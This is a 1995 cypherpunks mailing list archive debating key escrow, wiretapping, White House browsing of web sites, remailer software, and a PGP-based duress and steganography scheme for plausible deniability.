Davis) Date: Tue, 12 Sep 95 20:33:54 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID: On Tue, 12 Sep 1995, Mac Norton wrote: > Then, in W.Ky., as in Stockbridge, "You can get > anything you want..."? :) I'd stick with: *********************************************** You can't always get what you want 1 but if you try sometimes, sometimes you get what you need. 2 *********************************************** 1 ability to dump garbage where you want 2 a better appreciation for the environment :-) EBD > MacN > > On Tue, 12 Sep 1995, Brian Davis wrote: > > > On Tue, 12 Sep 1995, Peter Trei wrote: > > > > > > Finding the mail mixed in there is evidence that supports the "charge" > > > > but surely can be rebutted. When I was practicing in a small town c. > > > > 1984, people would be summoned (sent a paper telling them to show up) to > > > > court for illegal dumping if their mail was found with other trash, old > > > > refrigerators, etc., in a creek somewhere. Those charged could always > > > > put on proof that Billy Bob's garbage service picked up their trash ... > > > > > > > The sentence was almost always to go and pick up some multiple of the > > > > garbage found and take it to the landfill. > > > > > > This was Stockbridge, in MA, right :-? > > > > No, it was in Western Kentucky with a week or two of a family's garbage > > and maybe a worn out appliance or two. No garbage pickup provided by the > > county; private haulers expensive; dropping much at the landfill both > > inconvenient and "unnecessary" given the availability of hard to find > > valleys and creeks. > > > > EBD > > > > > > > That's what we did, and drove back to the church, had a > > > thanksgiving dinner that couldn't be beat, went to sleep and didn't > > > get up until the next morning, when we got a phone call from officer > > > Obie. Said "Kid, we found your name on an envelope at the bottom of a > > > half a ton of garbage, and just wanted to know if you had any > > > information bout it". I said "Yes Sir Officer Obie, I cannot tell a > > > lie, I put that envelope under that garbage." > > > (c) Arlo Guthrie > > > > > > > > > > > > > > > Peter Trei > > > Senior Software Engineer > > > Purveyor Development Team > > > Process Software Corporation > > > http://www.process.com > > > trei at process.com > > > > > > > Not a lawyer on the Net, although I play one in real life. > > ********************************************************** > > Flame way! I get treated worse in person every day!! > > > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From bdavis at thepoint.net Tue Sep 12 20:47:39 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:47:39 PDT Subject: your mail In-Reply-To: <199509122323.SAA23651@monad.armadillo.com> Message-ID: On Tue, 12 Sep 1995, Anonymous Remailing Service wrote: > E. Brian sed: > > > >Unbelievable!!! To add to this distressing truth, I have learned that > >the White House also subscribes to a number of newspapers and periodicals > >which are reviewed for things of interest to the Administration and to > >the President. I I I I I I ammmmmmmmmm shocked! > > mebbe tha Slickster just wants to know who orlin's "Deep Throat" is... > Keep checkin' them fingerprints, Willie! Certainly, Orlin's postings are of primary interest to everyone. Perhaps the White House Staff needs a new fiction writer for the next State of the Union address!! :-) > >Ooops. Dog bites man. > >And do you really think the White House couldn't hire a couple of net > >gurus to sniff packets if they wanted to hide their "monitoring"(=reading). > > who sez they dont post, too? > heh Your scoop related to net monitoring, not posting. I anxiously await your sequel. And so what if they did post. Maybe you are concerned about anonymous posting from the Administration??? And technically speaking, I guess, I am part of the Administration as an employee of the Executive Branch with some discretion in how I do my job. In the same sense, I was a part of Bush's Administration. Having had two rounds of off topic posting on this thread, I intend to give you the last word. I hope I can resist posting in response to what I am sure will be a thoughtful and enlightening reply. Sauron Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From bdavis at thepoint.net Tue Sep 12 20:52:45 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:52:45 PDT Subject: GAK/weak crypto rationale? In-Reply-To: <199509122307.QAA02486@mycroft.rand.org> Message-ID: On Tue, 12 Sep 1995, Jim Gillogly wrote: > > > Brian Davis writes: > > No question. Many high profile public corruption, Mafia, and high-level... > > ...In our district, we managed to convict almost 20 people... > > Particularly effective were the court-approved video and audio tapes of... > > > I don't doubt that wiretaps may sometimes be abused despite the > > incredibly onerous review process, but they have positive aspects, too. > > In how many of these cases did you fail to get the necessary information > because of encryption? Has this proportion been changing over the years? I wasn't personally involved in any of the cases, but I susupect the answer re encryption is zero. There was the time the FBI agent failed to push the record button, however. My response was to the wiretap correlation to career-making cases. I don't believe encryption is widespread enough yet to be a serious problem in the Title III area. It is a potential problem, though, as encryption (rightfully) spreads. The question I am debating with myself, with all of your help, is what the policy "ought to be." Even if I ultimately come down in my own mind on the Cypherpunks side of the line, understand that, as far as policy goes (and, hell, everything else for that matter), I'm a nobody. But I try to make up my own mind about what is right. EBD > > Jim Gillogly > Hevensday, 21 Halimath S.R. 1995, 23:06 > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From bdavis at thepoint.net Tue Sep 12 20:53:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:53:33 PDT Subject: GAK In-Reply-To: Message-ID: On Tue, 12 Sep 1995, Mac Norton wrote: > What's technology got to do with it, in principle? If > I write a letter in code, do I have to send the FBI the > key, just in case? ... The distinction, I think, is that for the past 40, 50, 60 ??? years, wiretapping has been available, recently only through court order (lawfully). Encryption changes the status quo. Change brings those who want to hasten it and those who want to stop it. The problem here, at least for me, is what *should* the policy be. You (with one or two exceptions) have provided me with a lot of grist for the mill. My thought process has changed dramatically on the issue, but is still fluid. EBD From hallam at w3.org Tue Sep 12 21:03:34 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Sep 95 21:03:34 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130255.AA03446@sulphur.osf.org> Message-ID: <9509130402.AA22458@zorch.w3.org> >What abuse? Is there an expectation of privacy in Web-world, >such that all users can honestly expect that a site is compelled >to keep its "visitor log" private? Absolutely, just as there is an assumption that private email will not be distributed over USEnet. There is a clear expectation of privacy. Just as the user of a USEnet server has an expectation of privacy. The question of what is legitimate to use log file data for is a very keenly debated one at W3 conferences. Phill H-B From bdavis at thepoint.net Tue Sep 12 21:38:18 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 21:38:18 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130255.AA03446@sulphur.osf.org> Message-ID: On Tue, 12 Sep 1995, Rich Salz wrote: > >Seriously folks I'm very pissed about the abuse of log file information. The > > What abuse? Is there an expectation of privacy in Web-world, > such that all users can honestly expect that a site is compelled > to keep its "visitor log" private? > > Surely not. I recall some bitter postings when a law enforcement agency got access to the log files of a Web page with information about a missing child. Perhaps that feeling can be felt on both sides of the fence. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From futplex at pseudonym.com Tue Sep 12 23:11:19 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Sep 95 23:11:19 PDT Subject: GAK/weak crypto rationale? In-Reply-To: <199509122051.QAA14953@pipe4.nyc.pipeline.com> Message-ID: <9509130611.AA19154@cs.umass.edu> John Young writes: > In response to an audience question about wiretaps and > crypto, Mr. Michael Nelson of the White House said at the > NIST GAK meeting (paraphrased): > > We are not concerned with bad people using crypto among > themselves, we can handle that. We are more concerned > with their using crypto to communicate with regular > folks, to make legitimate arrangements -- finance, > supplies, travel, and so on -- for their nefarious > deeds. It's the intermix of the bad with the good that's > the problem. Most of this reminds me of observations others have made (maybe here) about LEAs' typical use of wiretapping, commercial records, etc. in gathering evidence. It was said that criminals are often tracked/caught because of communications with friends/relatives, and transactions with above-board businesses to rent cars, buy plane tickets, etc. An argument against allegations that free crypto is hazardous proceeds, then, by pointing out that such contacts with *ahem* "regular folks" will be conducted in the clear, or at least that one party will be cooperative with investigators. Whether or not I encrypt my conversation with the Phil Zimmermann Travel Agency, however, doesn't affect the ability or inclination of the PZTA to divulge its records to the TLAs. They would no longer beable (old a.r.k. joke) to learn the contents of the communication directly from a wiretap. But if I understand the technology correctly, they could certainly trace an encrypted call to determine the identity of the other party. After that it's a trivial matter to ask the other party to reveal transaction records. So I don't see how the strong encryption of the "good" significantly interferes with The Legitimate Needs of Law Enforcement in and of itself. (As an aside, the situation may get murky when the Phil Zimmermann Travel Agency carries out transactions over the net with cryptographically sound digital pseudonyms. Depending on the circumstances, true ecash with reasonable payor anonymity may also need to be involved. This is where I suspect untraceable transactions make the LEAs uncomfortable: untraceable garden variety transactions) > Maybe someone else at the meeting heard this differently > and will comment, but this seems to mean that the Feds can > track, and maybe crack, the crypto-intercomm of "bad > people" so long as it is not buried in a torrent of public > crypto use. And not commingled with lawful, ECPA- > protected(?), communication. Hmmm. The bit about "the intermixing of bad and good" is puzzling. "Bad" and "good" seem to be defined in terms of the identities of the parties to a communication. Figuring those out isn't hindered by strong crypto per se. I remain unclear as to the source of their expressed concern. Your paraphrase of Nelson's statement strikes me as remarkable. Doesn't "we are not concerned with bad people using crypto among themselves" run completely counter to all the hyperbole about terrorists planning OKC II with PGP ? Does anyone have an exact quotation ? At any rate, sign me up as a "bad person".... Incidentally, recent events in France highlight the absurdity of Les Quatres Chevaliers. The French government's crypto registration requirements don't seem to have been much of a deterrent to the serial Metro bombers -- quelle surprise ! I hope someone in Washington is paying attention. -Futplex From loki at obscura.com Tue Sep 12 23:41:09 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 12 Sep 95 23:41:09 PDT Subject: Mixmaster posting poll Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I am about to release Mixmaster 2.0.2 This version will not contain the Socket code, but will have a bunch of bug fixes. One of the things I am modifying is the posting to news feature. Mixmaster supports posting through either a local inews program, or through a mail-to-news gateway. There seem to be two flavors of the latter: group.name at gateway.com and mail2news at gateway.com Newsgroups: group.name I really only want to support one of these standards. Which is more standard? Is there a trend towards one becoming the dominant standard? The next version should be out within 48 hours. -Lance -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFZ+PvPzr81BVjMVAQEa2Qf/d9a3UTzan5gLB/GN/n+DaMSvDLRVJ96V JpH4F+5SO+UQgdxoSAup9+/l+Q11A4O1ZjxpELVEh6e/7U8HjzrGQHCXGIMfzxkt DufouYDViio8cQ7w1Y4OLqlqaD10OUJ5Chrzm013mc7PzFBgF5eb6rf8S4TdGEYg Ly92xWgYHHk8EwhviYxqdBAGnSSTykEkY9E5WHLca+Lt+5ejox1uMEirq6I4rRVZ UBhfiVQhRsD2eKRUx/a3D3eVnuj0jS8+4i3ibcpUDxm+8WY76zGzmz67y66MzaDo 0E0fFK1VeCwrBoNqFJSLYY5e17c7T6hI3mWJYaZFOLL7H3rGsYUcHw== =BdWR -----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From nobody at REPLAY.COM Wed Sep 13 00:10:27 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 13 Sep 95 00:10:27 PDT Subject: NYT on GAK In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com> Message-ID: <199509130710.JAA26140@utopia.hacktic.nl> Adam Shostack wrote: > Its a good thing the administration only wants to outlaw > cryptography, not anonymity. But you can't have strong anonymity without strong cryptography. From sameer at c2.org Wed Sep 13 00:24:37 1995 From: sameer at c2.org (sameer) Date: Wed, 13 Sep 95 00:24:37 PDT Subject: Community ConneXion & its new look Message-ID: <199509130719.AAA12672@infinity.c2.org> Community ConneXion is in the process of upgrading its web presence and image. If you'd like to keep abreast of developments, check http://www.c2.org regularly-- most of the changes are in terms of focus & marketing angle, but new services should be appearing soon as well. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From damion.furi at the-matrix.com Wed Sep 13 04:58:40 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 13 Sep 95 04:58:40 PDT Subject: Whitehouse "dissident In-Reply-To: <8B0F439.000504F727.uuout@the-matrix.com> Message-ID: <8B10180.000504F829.uuout@the-matrix.com> TCM|We don't believe in "security through obscurity," do we? The notion that we |are "safe" if the White House, or (horrors!) Janet Reno herself, are not |reading our list or the Web sites on various issues, is the same kind of |security the ostrich thinks he has with his head in the sand and his butt |in the air. Maybe so, but we don't have to like it. And I don't. But it's not so much their access, per se, that I object to. It's their potential intentions, all things considered, and the fact that they aren't at all open about such monitoring. TCM|If you want to be unheard by the Feds, and the White House, and the FBI, |and GCHQ, and Mossad, etc., then don't post publically. If you want your |own access to Web sites kept private, push for the development of Web |proxies ("Web remailers"). Mix or Flame is fine. :) furi at the-matrix.com pgp-public-key at demon.co.uk C1225CE1 RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support From buster at klaine.pp.fi Wed Sep 13 05:03:23 1995 From: buster at klaine.pp.fi (Kari Laine) Date: Wed, 13 Sep 95 05:03:23 PDT Subject: Whitehouse "dissident" and net monitoring Message-ID: <199509131202.AA15294@personal.eunet.fi> > From: lindat at iquest.net (Linda Thompson, American Justice Federation) > > The National Security Agency presumably can monitor > >subversive communication on the Internet without leaving any > >trace by "sniffing packets" at traffic nodes. Well they are just doing what their charter says they should be doing - gathering information. > > It turns out that computers from inside the White House have > >kept pretty good tabs on information available on Whitewater, > >Vince Foster, and Mena at a few key repositories on the World- > >Wide Web, a subset of the Internet. I think that's because White House workers has access to net and of course they are surfing like all the rest of us - they are just people you know :-) If that would be part of something hard level information gathering I assure you they would not leave so clear traces. > >Office of the President between August 28 and August 31. If the > >White House is showing a similar interest in other sites on the > >World Wide Web, that would amount to a monitoring operation of > >considerable magnitude. So are you saying White House by itself checked out those places or are you saying that *people* working inside the White House happened to be interested issues available on those sites and accessed them. And so what it is public information when it is on the WWW - isn't it? > > In light of this information, I have the following questions: My guesses are > >(1) Does this constitute "casual browsing" by White House staff, or > > is it, in light of the considerable time and effort spent during > > regular business hours, part of a monitoring or intelligence operation? Probably both > >(2) For what purpose is the information transferred to the White House used? Probably to read it and maybe learn something from it :-) > >(3) Does the White House keep information from these web sites on file, > > and does the White House keep a file on the persons responsible for > > these web sites? Hell I am keeping my own records and on the other hand I am in the process to get/buy/snatch/built a system where I could automatically scan all the newsgroups with some kind of AI system and to keep an eye on certain FTP, GOPHER,WAIS, WWW and so on to keep me bether informed. This partly because this information from interne is getting out of proportion AND quite a big part of it is just rubbish and wasting your time. > >(4) Is the April 9 statement by David Lytel of the White House Office of > > Science and Technology to Amy Bauer of Copley News Service that the > > administration does not monitor anti-Clinton activity on the web still > > operative? Probably they do and they really should. If I was Mr. Clinton (which I luckily am not) I would want my adjudats to prepare a report for me each morning summing up all the possible comments round subject Clinton and The USA from NET: That would be very precisious source of feedback to finetune your acts. And that information is real time. Totally another thing which somehow belongs to this subject should intelligence bodies watch for the net. I am middle reading Spycatcher book. Btw I don't understand all the hype rouund it and I would say in that book there is not enough substance to ban it's printing in certain countries. Anyway again in that book it becomes clear that the most riskiest part of the agent and therefore on of the best way to unweil them is to concentrate on their communications with the coordinators in that particular country or on the communication directed to country behind the operation. So clearly to make agents more succesfull their coummication is the one needing new techniques - how about internet? It is accessible almost everywhere and you can get an account without giving your real identity. By using certain sites you just call in from telephone box give few information or in some places none and you are ready for almost totally untraceable communication. I bet they are using it already a lot to replace clumsy readio communication. Don't get me wrong I vote for freedom of speech(whitch is getting slimmer), privacy (witch there is not much left), no regulation on encryption (which is not going to be) but I don't like these things used against my country's security and steal our intellectual property. Based on this I tend to think every self respecting intelligence organization must have those taps otherwise they are not doing their job properly. > "When even one American -- who has done nothing wrong -- is forced by fear > to shut his mind and close his mouth, then all Americans are in peril." > Harry Truman Truman might have been one of the best presidents US ever had but talk is talk and deeds are deeds. Comments and reasoning is totally my own imagination my employer would propably disabprove them and certainly not they don't represent my employers opinions. Be carefull out there ... Best Regards Kari Laine Kari Laine buster at klaine.pp.fi LAN Vision Oy Tel. +358-0-502 1947 Sinikalliontie 14 Fax +358-0-524 149 02630 ESPOO BBS +358-0-502 1576/1456 FINLAND From hugh at ecotone.toad.com Wed Sep 13 05:39:28 1995 From: hugh at ecotone.toad.com (Hugh Daniel) Date: Wed, 13 Sep 95 05:39:28 PDT Subject: ADMIN: How to find out if you have been culled from the list Message-ID: <9509131238.AA22758@ecotone.toad.com> If I (or any software I write) remove a user from the list the users entry now gets appended to the culled.users file. Since I was keeping a list anyway, I have set it up so that anyone can email/download the list of recently culled cypherpunks via majordomo. If you stop getting your CP drug for too long, before sending a note to the list(shame!) ask for this file to see if I culled you. If you forget how to get a file send a help message to . Here is a quick (emacs) example of how to get the file: To: majordomo at toad.com --text follows this line-- get cypherpunks culled.users end and the file will show up soon. This is a very boring file (dates and email addresses). You might want to save this message away, so you will have it to reference if need be. Now, you get back to writing that great crypto/UI package! ||ugh Daniel Sometimes Postmaster Always Majordomo Potty Trainer From jya at pipeline.com Wed Sep 13 05:44:35 1995 From: jya at pipeline.com (John Young) Date: Wed, 13 Sep 95 05:44:35 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509131244.IAA07887@pipe4.nyc.pipeline.com> Responding to msg by futplex at pseudonym.com (Futplex) on Wed, 13 Sep 2:11 AM >Your paraphrase of Nelson's statement strikes me as >remarkable. Doesn't "we are not concerned with bad >people using crypto among themselves" run completely >counter to all the hyperbole about terrorists planning >OKC II with PGP ? Does anyone have an exact quotation >? At any rate, sign me up as a "bad person".... "Bad people" is my euphemism for Mr. Nelson's "terrorist" -- which brought snorts from the audience. Yes, his statement about not being concerned with crypto use among terrorists was surprising. On a verbatim transcript: Mr. Ed Roback of NIST, the KE meet director, said that a complete transcript of the proceedings will not be published, only a summary report at some point, and then, after the September 15 session, some version will appear in the Federal Register for public comment. The summary report should appear eventually at the NIST web site -- the CSSPAB site has reports for prior KE sessions in the annual reports. See for 1994, and similar for earlier years, on key escrow documents. To amplify what Tim said, the CSSPAB site has very interesting docs. From hfarkas at ims.advantis.com Wed Sep 13 06:03:12 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Wed, 13 Sep 95 06:03:12 PDT Subject: Scientology tries to break PGP - and Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 12 Sep 1995, S. Keeling wrote: > I would just like to point out that, when a LEA comes to you > to get at the contents of your computer, (s)he is not going to > patiently wait while your system wipes the offending evidence off your > hard disk. The first thing they do is make a copy of everything, so > they can work from the copy. Besides, you do have backup tapes laying > around all over the place, don't you? Acutally, I have *everything* laying around all over the place but I suppose that's off-topic. They have to decrypt the file sometime if they want it's "contents". I use the -w option when encrypting. After encryption, the "dummy" file (would be) embedded and the plaintext is wiped. The only "secret" key is the "fake" key. The "real" key is under the blender in the kitchen. (If I get busted and they search under the blender I will write back if I'm in a position to do so. Not that I have anything to get busted for of course. :) Don't back up plaintext and what is the problem here? Where will they get the "real" data from? What does it matter where the decryption takes place? And no, I don't have backup tapes laying around; I use a Zip Drive! :-) =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFbWVqDthkLkvrK9AQFxlAP+P3blN7wD42aUNctsCF9QALqsRdGHPsdo B6ALA72dqVYXGIsW9M3DVxXAM2WAosHl2rDKXbTrXwirxCJQBPkYQLT9Vdzl8nyJ hb0uNb2zo9xQ8ImM/dCuUqGazW2tnnAXuHZ9KkwDAQFDwDpNtjkHYCSDRgKmPmWO fUjGpsVViU8= =3JI5 -----END PGP SIGNATURE----- From futplex at pseudonym.com Wed Sep 13 06:30:47 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 13 Sep 95 06:30:47 PDT Subject: (NOISE) Re: White House MONITORS Web Pages ! In-Reply-To: <8B10180.000504F829.uuout@the-matrix.com> Message-ID: <9509131330.AA25431@cs.umass.edu> This is NOISE ! DAMION FURI writes: > Maybe so, but we don't have to like it. And I don't. But > it's not so much their access, per se, that I object to. Why the hell do you care ? Someone has a home page for something on the Web. Someone at the White House looks at it. So what ? You object to the fact that somebody in the government has a Web browser and *gasp* uses it to read stuff on the WWW ??? > It's their potential intentions, You take moral offense to what you think someone else _might_ be thinking ? Sounds like you believe in thoughtcrime. Banned any good books lately ? > all things considered, and > the fact that they aren't at all open about such monitoring. This is absurd. You expect the White House to issue a press release every time a staffer clicks on a URL ? "WASHINGTON (UPI) The Clinton Administration unveiled plans today to add several new sites to the White House bookmarks list. At a hastily arranged press briefing this morning, Defense Secretary William Perry told reporters that the changes would be implemented in close consultation with NATO allies. There was little immediate reaction from Capitol Hill. Members on both sides of the aisle said they needed time to study the proposal in detail." Someone please tell me this is just an extremely premature April Fool's joke... -Futplex From ab411 at detroit.freenet.org Wed Sep 13 06:33:14 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Wed, 13 Sep 95 06:33:14 PDT Subject: Scientology tries to break PGP - and Message-ID: <199509131332.JAA29256@detroit.freenet.org> Henry W. Farkas writes: >On Tue, 12 Sep 1995, S. Keeling wrote: > >> I would just like to point out that, when a LEA comes to you >> to get at the contents of your computer, (s)he is not going to >> patiently wait while your system wipes the offending evidence off your >> hard disk. ... >> they can work from the copy. Besides, you do have backup tapes laying >> around all over the place, don't you? > >They have to decrypt the file sometime if they want it's "contents". > >I use the -w option when encrypting. After encryption, the "dummy" file >(would be) embedded and the plaintext is wiped. ... And the idea is that on decrypting with the 'wrong' key, it outputs the dummy file rather than the real plaintext, correct? > ... Don't back up plaintext and what is the problem here? >Where will they get the "real" data from? What does it matter where the >decryption takes place? ... Why would they use your copy of the program to decrypt the file? They could just use a version that lacked this 'feature'. Of course, they still couldn't get at the real plaintext unless you gave them the key, but you are right back to the same old standoff where they say, "Give us your key," and you (try to) say, "No." -- David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad Hardware & Software Committee -- Finger conrad at grfn.org for public key Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From majordomo at europages.com Wed Sep 13 06:47:39 1995 From: majordomo at europages.com (majordomo at europages.com) Date: Wed, 13 Sep 95 06:47:39 PDT Subject: Majordomo results: (NOISE) Re: White House MONITORS Web Pag Message-ID: <9509131453.AA14290@europages.com> -- >>>> This is NOISE ! **** Command 'this' not recognized. >>>> >>>> DAMION FURI writes: **** Command 'damion' not recognized. >>>> > Maybe so, but we don't have to like it. And I don't. But **** Command '>' not recognized. >>>> > it's not so much their access, per se, that I object to. **** Command '>' not recognized. >>>> >>>> Why the hell do you care ? Someone has a home page for something on the Web. **** Command 'why' not recognized. >>>> Someone at the White House looks at it. So what ? You object to the fact **** Command 'someone' not recognized. >>>> that somebody in the government has a Web browser and *gasp* uses it to read **** Command 'that' not recognized. >>>> stuff on the WWW ??? **** Command 'stuff' not recognized. >>>> >>>> > It's their potential intentions, **** Command '>' not recognized. >>>> >>>> You take moral offense to what you think someone else _might_ be thinking ? **** Command 'you' not recognized. >>>> Sounds like you believe in thoughtcrime. Banned any good books lately ? **** Command 'sounds' not recognized. >>>> >>>> > all things considered, and **** Command '>' not recognized. >>>> > the fact that they aren't at all open about such monitoring. **** Command '>' not recognized. >>>> >>>> This is absurd. You expect the White House to issue a press release every time **** Command 'this' not recognized. >>>> a staffer clicks on a URL ? **** Command 'a' not recognized. >>>> >>>> "WASHINGTON (UPI) The Clinton Administration unveiled plans today to **** Command '"washington' not recognized. >>>> add several new sites to the White House bookmarks list. At a hastily **** Command 'add' not recognized. >>>> arranged press briefing this morning, Defense Secretary William Perry **** Command 'arranged' not recognized. >>>> told reporters that the changes would be implemented in close **** Command 'told' not recognized. >>>> consultation with NATO allies. There was little immediate reaction **** Command 'consultation' not recognized. >>>> from Capitol Hill. Members on both sides of the aisle said they **** Command 'from' not recognized. >>>> needed time to study the proposal in detail." **** Command 'needed' not recognized. >>>> >>>> Someone please tell me this is just an extremely premature April Fool's joke... **** Command 'someone' not recognized. >>>> >>>> -Futplex END OF COMMANDS **** Help for majordomo: This is Brent Chapman's "Majordomo" mailing list manager, version 1.93. In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. It understands the following commands: subscribe [
] Subscribe yourself (or
if specified) to the named . unsubscribe [
] Unsubscribe yourself (or
if specified) from the named . get Get a file related to . index Return an index of files you can "get" for . which [
] Find out which lists you (or
if specified) are on. who Find out who is on the named . info Retrieve the general introductory information for the named . lists Show the lists served by this Majordomo server. help Retrieve this message. end Stop processing commands (useful if your mailer adds a signature). Commands should be sent in the body of an email message to "majordomo". Commands in the "Subject:" line NOT processed. If you have any questions or problems, please contact "Majordomo-Owner". From frissell at panix.com Wed Sep 13 07:12:24 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 07:12:24 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <199509131412.KAA26837@panix.com> At 06:03 PM 9/12/95 -0400, Brian Davis wrote: >Unbelievable!!! To add to this distressing truth, I have learned that >the White House also subscribes to a number of newspapers and periodicals >which are reviewed for things of interest to the Administration and to >the President. I I I I I I ammmmmmmmmm shocked! The government, as you no doubt know, sometimes operates under different rules. Thus when the "Red Squad" (Intelligence Division) of the New York City Police (located in that big building on the North side of Vandam between Greenwich and Houston BTW) was sued for maintaining files on "lawful protest groups" they entered into a consent agreement to refrain from this sort of thing. Later, the courts said that this agreement meant that the cops couldn't even listen to WLIB radio (NYC's favorite radical African-American station) to find out in advance where rallies were going to be. Since the White House is doing this reading of sites with public funds and since that institution is the most powerful in the world --- it can nuke its enemies, for example --- people are naturally interested to discover if they are the subject of an investigation. This is a demonstration of the unintended effect of electronic surveillance technology. The fact is that it can do more harm to the authorities than to the public. The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney King Video. Since those in power are more interesting than ordinary people, they represent a more "target-rich environment." Information about their activities has greater commercial value and is thus more likely to see the light of day. DCF "There are more of us than there are of you." From nobody at REPLAY.COM Wed Sep 13 07:15:44 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 13 Sep 95 07:15:44 PDT Subject: Dirty Jobs Ad Message-ID: <199509131415.QAA00857@utopia.hacktic.nl> NY Times, Sept 13, 1995. For the outawork: C.I.A.'s Chief Calls Covert Action a Must Washington, Sept. 12 -- The Central Intelligence Agency will maintain, and perhaps increase, its covert operations abroad and continue to hire informers from terrorist cells, military regimes and drug syndicates, the new Director of Central Intelligence said today. The Director, John M. Deutch, called espionage "the core mission of the Central Intelligence Agency." That mission has been questioned by critics of the C.I.A. in Congress and the foreign-policy establishment, who wonder whether the rewards of secret information are worth the risks of undertaking covert operations and recruiting murderous and corrupt foreign agents. ----- From adam at bwh.harvard.edu Wed Sep 13 07:17:23 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 13 Sep 95 07:17:23 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130226.AA22319@zorch.w3.org> Message-ID: <199509131416.KAA06476@bwh.harvard.edu> Phill wrote: | If we are serious about privacy I think we should be very clear that | we respect the privacy of Whitehouse staffer and staffers in the | Senate and House. I'm not being partisan about this, I have put a | lot of effort into getting participationfrom the right as well as | the left. I've just not been very successful in that area. Sure. I'll respect their privacy as much as they, and the organizations they oversee, respect mine. I'll use as the respresentative organizations the IRS and the Social Security Administration, which respects my pricvacy so much that they use prison inmates to process paperwork. If I was in a nasty mood, I'd add the USPS. Sarcasm aside, they show no interest in other people's privacy. Why should we go out of our way to do anything but show them how bad the situation is? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From aba at dcs.exeter.ac.uk Wed Sep 13 07:28:22 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Wed, 13 Sep 95 07:28:22 PDT Subject: Scientology tries to break PGP - and Message-ID: <759.9509131426@exe.dcs.exeter.ac.uk> > Why would they use your copy of the program to decrypt the file? > They could just use a version that lacked this 'feature'. Of > course, they still couldn't get at the real plaintext unless you > gave them the key, but you are right back to the same old standoff > where they say, "Give us your key," and you (try to) say, "No." I agree, you can't rely on them using your doctored program, it must be resilient to them having a copy of all of your software, and their own fresh copies of software, and a backup of each copy before starting, and still provide pluasible deniability. Here's an idea to do just that, perhaps something which could be added to a future PGP. I reckon this is what you'd do: % pgp -es duress % pgp -es msg % stealth < msg.pgp > msg.stl % cat msg.stl >> duress.pgp % pgp +makerandom=1234 noise % cat noise >> duress.pgp % pgp -a duress.pgp % mail someone < duress.asc The pgp +makerandom= is an undocumented feature of pgp > 2.6 (not sure exactly when it got added, Colin Plumb pointed it out when I asked him about ran nos for stealth). So what this means is that you are using PGP it's self to hide a stegoed message. This would be good for the guy from FACTnet (forgotten his name) who just got hit by the CoS, he could hold out for a while, then give up his key, the duress message would appear, and the real message would be explained by having a script to do this on his HD, and having long since burned the disk with a script to do the above on it: % pgp -es msg % pgp +makerandom=4567 noise % cat noise >> msg.pgp % pgp -a msg.pgp % mail someone < msg.asc ie the idea is that you pad your message to a fixed size for the express purpose of hampering traffic analysis (of the type of my, Alice did have a lot to say to Bob that day). It would be even better cover if the thing had gotten sent through a remailer, as this kind of thing is expected of type I remailer traffic (before mixmaster which does the packetizing for you). So the duress message really looks like this: +---------+---------------------------+--------------------+--------+ | pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise 